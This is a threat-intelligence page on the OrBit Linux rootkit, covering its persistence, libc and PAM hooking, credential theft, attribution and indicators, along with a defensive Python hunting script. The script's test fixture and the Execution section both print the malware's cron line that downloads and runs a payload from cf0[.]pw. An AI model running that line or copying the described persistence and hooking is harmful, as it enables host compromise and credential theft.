Orbit
OrBit is a Linux userland rootkit/backdoor that persists by installing a malicious shared library and modifying dynamic linker configuration so the library is loaded into every process. First publicly analyzed in 2022, it is described as using extensive libc hooking—more than 40 hooked functions—to hide files, directories, processes, and network activity, and to evade detection. OrBit intercepts SSH and sudo authentication activity to harvest usernames and passwords via PAM-related hooks, and later builds added a pam_sm_authenticate hook that can manipulate authentication outcomes. It also provides SSH backdoor access.
The malware stores stolen credentials and configuration data in hidden directories including /lib/libseconf/, with earlier or alternate install paths including /lib/libntpVnQE6mk/ and /lib/locate/. Reported fixed artifacts from the underlying codebase include sshpass.txt, .logpam, and in 2025 activity /etc/cron.hourly/0. Researchers identified two build lineages: Lineage A retained the full feature set, while Lineage B was a reduced-feature variant that removed PAM interception, packet capture, and TCP port hiding and appears to have disappeared after 2024.
Research cited on this page concludes OrBit is not a wholly original family but a modified build/fork of the publicly available Medusa LD_PRELOAD rootkit released on GitHub in December 2022. Operators changed XOR keys, install paths, and embedded SSH credentials across samples. In 2025, OrBit-related activity introduced a two-stage infector/dropper chain: an infector scanned for ELF binaries, injected payloads into /bin/ls and other writable 64-bit ELF files, used the marker bongripz4jezuz to avoid reinfection, and created /etc/cron.hourly/0 to fetch and execute a remote payload from http://cf0[.]pw/0. The domain cf0[.]pw was reported resolving to 109.95.212[.]253, with related infrastructure including 109.95.211[.]141.
The sources on this page associate OrBit, or the same codebase, with multiple threat clusters rather than a single actor. Reported users include UNC3886, which matched a MEDUSA/OrBit configuration via XOR key, credentials, install path, and a strace artifact containing the string "orbit"; BLOCKADE SPIDER, which reportedly used OrBit to maintain stealthy access in VMware virtualization environments; and a 2025 campaign sharing tooling and infrastructure characteristics with the RHOMBUS Linux botnet ecosystem. High-confidence indicators mentioned on this page include SHA256 73b95b7d1006caf8d3477e4a9a0994eaa469e98b70b8c198a82c4a12c91ad49a for a 2025 two-stage infector and SHA256 b982276458a85cd3dd7c8aa6cb4bbb2d4885b385053f92395a99abbfb0e43784 for a 2020 RHOMBUS dropper with shared architecture.
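The persistence mechanism and artifacts described above translate directly into a host hunt. The script below is an added example written for this page; it is not Mallory's tooling, a vendor detection, or code from any OrBit write-up. It walks a filesystem root and reports the artifacts the reporting names: any /etc/ld.so.preload entry, the /lib/libseconf/, /lib/libntpVnQE6mk/ and /lib/locate/ install directories with the sshpass.txt and .logpam files inside them, the /etc/cron.hourly/0 fetcher referencing cf0[.]pw, the bongripz4jezuz marker inside ELF files, and the two SHA256 hashes quoted above. The `root` parameter, the `scan_dirs` list, and the `build_sample_tree`/`demo` helpers (which construct a fake tree with placeholder contents) are assumptions of this example, not anything from the page.

```python
"""Host hunt for OrBit persistence and infection artifacts (added example)."""
import hashlib
import tempfile
from pathlib import Path

# Artifacts named in the OrBit reporting on this page.
ORBIT_DIRS = ["lib/libseconf", "lib/libntpVnQE6mk", "lib/locate"]
ORBIT_FILES = {"sshpass.txt", ".logpam"}
CRON_FETCHER = "etc/cron.hourly/0"
CRON_DOMAINS = (b"cf0.pw", b"cf0[.]pw")       # live form and defanged form
INFECTION_MARKER = b"bongripz4jezuz"
KNOWN_SHA256 = {
    "73b95b7d1006caf8d3477e4a9a0994eaa469e98b70b8c198a82c4a12c91ad49a": "2025 two-stage infector",
    "b982276458a85cd3dd7c8aa6cb4bbb2d4885b385053f92395a99abbfb0e43784": "2020 RHOMBUS dropper",
}
ELF_MAGIC = b"\x7fELF"


def is_elf(path: Path) -> bool:
    """True if the file starts with the ELF magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def hunt_orbit(root="/", scan_dirs=("bin", "usr/bin", "lib", "usr/lib")) -> list:
    """Return (finding, detail) tuples; an empty list means nothing matched.

    Caveat: a running OrBit hooks readdir/stat in every dynamically linked
    process, including this interpreter, so results from a live host can be
    incomplete. Run it from a rescue boot or against a mounted image when
    the host is suspected to be compromised.
    """
    root = Path(root)
    findings = []

    # 1. Any ld.so.preload entry forces a library into every process;
    #    on a clean host the file normally does not exist at all.
    preload = root / "etc/ld.so.preload"
    if preload.is_file():
        for line in preload.read_text(errors="replace").splitlines():
            if line.strip():
                findings.append(("ld.so.preload entry", line.strip()))

    # 2. Hidden install directories and the credential/log files inside them.
    for rel in ORBIT_DIRS:
        d = root / rel
        if d.is_dir():
            findings.append(("OrBit install directory", str(d)))
            for p in d.rglob("*"):
                if p.name in ORBIT_FILES:
                    findings.append(("OrBit credential/log file", str(p)))

    # 3. The 2025 cron-based payload fetcher.
    cron = root / CRON_FETCHER
    if cron.is_file():
        body = cron.read_bytes()
        hit = any(dom in body for dom in CRON_DOMAINS)
        findings.append(("cron.hourly fetcher", "references cf0[.]pw" if hit else str(cron)))

    # 4. ELF files carrying the infection marker, and known sample hashes.
    for rel in scan_dirs:
        base = root / rel
        if not base.is_dir():
            continue
        for p in base.rglob("*"):
            if p.is_symlink() or not p.is_file() or not is_elf(p):
                continue
            data = p.read_bytes()
            if INFECTION_MARKER in data:
                findings.append(("infection marker in ELF", str(p)))
            label = KNOWN_SHA256.get(hashlib.sha256(data).hexdigest())
            if label:
                findings.append(("known OrBit sample hash", f"{p} ({label})"))
    return findings


def build_sample_tree(base) -> Path:
    """Construct a fake root with OrBit-style artifacts (test data, not real samples)."""
    base = Path(base)
    (base / "etc/cron.hourly").mkdir(parents=True)
    (base / "lib/libseconf").mkdir(parents=True)
    (base / "bin").mkdir()
    (base / "etc/ld.so.preload").write_text("/lib/libseconf/libplaceholder.so\n")
    (base / "lib/libseconf/sshpass.txt").write_text("constructed placeholder\n")
    (base / CRON_FETCHER).write_text(
        "wget --quiet http://cf0[.]pw/0 -O- 2>/dev/null|sh >/dev/null 2>&1\n")
    # A fake "infected" ELF carrying the marker, and a clean one beside it.
    (base / "bin/ls").write_bytes(ELF_MAGIC + b"\x00" * 16 + INFECTION_MARKER + b"\x00" * 8)
    (base / "bin/cat").write_bytes(ELF_MAGIC + b"\x00" * 32)
    return base


def demo() -> list:
    """Build the constructed tree in a temporary directory and hunt it."""
    with tempfile.TemporaryDirectory() as tmp:
        return hunt_orbit(build_sample_tree(tmp))


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind}: {detail}")
```

Against a real host, call `hunt_orbit("/")` from a rescue environment or `hunt_orbit("/mnt/image")` against a mounted disk; the constructed tree exists only so the logic can be exercised offline. Paths from the known-directory list are checked by name because the reporting gives them as fixed strings, while the marker and hash checks read file contents, so they still work if an operator rotates install paths.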
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A dangerous rootkit called OrBit has been quietly targeting Linux systems for years, stealing login credentials and hiding deep inside infected machines without triggering most security tools.
Techniques & procedures
15 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
4 techniques
That same year, a new two-stage delivery chain appeared: an infector embeds a dropper, which then extracts and installs the rootkit, with a cron job created to fetch updated payloads from an external domain.
/etc/cron.hourly/0: wget --quiet http://cf0[.]pw/0 -O- 2>/dev/null|sh >/dev/null 2>&1
To make our library execute code immediately upon loading, we use the constructor attribute: void __attribute__((constructor)) init(). This tells the linker: “run this function before the main program even starts.”
Persistence
3 techniques
That same year, a new two-stage delivery chain appeared: an infector embeds a dropper, which then extracts and installs the rootkit, with a cron job created to fetch updated payloads from an external domain.
Where earlier versions could only passively collect credentials when users typed them, this new version can also forge authentication outcomes, meaning attackers can approve or deny login attempts on a compromised system at will.
Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack... allowing the attacker to approve or deny login attempts at will.
Privilege Escalation
1 technique
Stealth
6 techniques
OrBit works by embedding itself into the core of a Linux system, hooking into more than forty basic system functions so that it becomes almost completely invisible.
The infector scans the filesystem for ELF binaries and injects the second-stage payload into them. An infection marker bongripz4jezuz... is checked before each infection attempt to avoid re-infecting the same target.
All other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding... LD_PRELOAD management, log suppression, and process hiding.
Along the way, the operators rotate XOR keys, shuffle install paths, swap backdoor credentials, add auditd-evasion hooks...
Its evasion capabilities are comprehensive, hooking over forty libc functions to hide files, processes, and network connections from administrators and security tools alike.
All other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding... log suppression, and process hiding.
The malware stores captured credentials and configuration data in a hidden directory called /lib/libseconf/, which standard tools cannot see due to the rootkit’s own hooks.
Defense Impairment
2 techniques
Where earlier versions could only passively collect credentials when users typed them, this new version can also forge authentication outcomes, meaning attackers can approve or deny login attempts on a compromised system at will.
Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack... allowing the attacker to approve or deny login attempts at will.
Credential Access
4 techniques
All other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding... pcap sniffing...
Where earlier versions could only passively collect credentials when users typed them, this new version can also forge authentication outcomes, meaning attackers can approve or deny login attempts on a compromised system at will.
Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack... allowing the attacker to approve or deny login attempts at will.
Once inside a machine, it listens for login attempts through SSH and sudo, capturing usernames and passwords and saving them in a hidden directory that standard system scans cannot detect.
Discovery
1 technique
Command and Control
1 technique
a cron job created to fetch updated payloads from an external domain.
Other
1 technique
IOCs tracked for this family
35 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Linux rootkit that embeds as a shared library, hooks core system functions to hide itself, captures SSH and sudo credentials, stores them in hidden directories, and provides covert SSH backdoor access. Later variants also hook PAM authentication to forge login outcomes and use droppers/infectors with cron-based payload retrieval.
Linux userland rootkit deployed as a shared library that patches the dynamic linker for persistence, hooks libc and PAM functions to hide activity and harvest credentials, and provides stealthy SSH backdoor access. Later variants added auditd evasion, xread compatibility logic, and PAM service-side impersonation.
Modern Linux rootkit referenced as using linker-based execution flow hijacking techniques.
Referenced as a prior Linux malware family that abused PAM APIs for credential logging and remote access.